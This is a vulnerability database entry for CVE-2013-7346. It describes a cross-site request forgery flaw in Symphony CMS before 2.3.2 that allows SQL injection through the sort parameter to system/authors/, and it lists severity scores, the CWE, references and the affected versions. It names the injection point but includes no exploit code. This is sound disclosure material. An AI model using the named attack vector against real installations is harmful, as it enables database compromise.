Vulnerability Details : CVE-2013-7346
Cross-site request forgery (CSRF) vulnerability in Symphony CMS before 2.3.2 allows remote attackers to hijack the authentication of administrators for requests that conduct SQL injection attacks via the sort parameter to system/authors/, related to CVE-2013-2559.
Vulnerability category: Sql InjectionCross-site request forgery (CSRF)
Exploit prediction scoring system (EPSS) score for CVE-2013-7346
Probability of exploitation activity in the next 30 days: 0.09%
Percentile, the proportion of vulnerabilities that are scored at or less: ~ 37 % EPSS Score History EPSS FAQ
CVSS scores for CVE-2013-7346
| Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source |
|---|---|---|---|---|---|
|
6.8
|
MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
8.6
|
6.4
|
NIST |
CWE ids for CVE-2013-7346
-
The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.Assigned by: nvd@nist.gov (Primary)
References for CVE-2013-7346
-
http://archives.neohapsis.com/archives/bugtraq/2013-04/0018.html
Exploit
-
https://www.htbridge.com/advisory/HTB23148
SQL Injection Vulnerability in Symphony - HTB23148 Security Advisory | ImmuniWebExploit
Products affected by CVE-2013-7346
- cpe:2.3:a:getsymphony:symphony:*:*:*:*:*:*:*:*
- cpe:2.3:a:getsymphony:symphony:2.0.7:*:*:*:*:*:*:*
- cpe:2.3:a:getsymphony:symphony:2.1.1:*:*:*:*:*:*:*
- cpe:2.3:a:getsymphony:symphony:2.0.4:*:*:*:*:*:*:*
- cpe:2.3:a:getsymphony:symphony:2.0.5:*:*:*:*:*:*:*
- cpe:2.3:a:getsymphony:symphony:2.0.6:*:*:*:*:*:*:*
- cpe:2.3:a:getsymphony:symphony:2.0:*:*:*:*:*:*:*
- cpe:2.3:a:getsymphony:symphony:2.0.3:*:*:*:*:*:*:*
- cpe:2.3:a:getsymphony:symphony:2.3:*:*:*:*:*:*:*
- cpe:2.3:a:getsymphony:symphony:2.1.0:*:*:*:*:*:*:*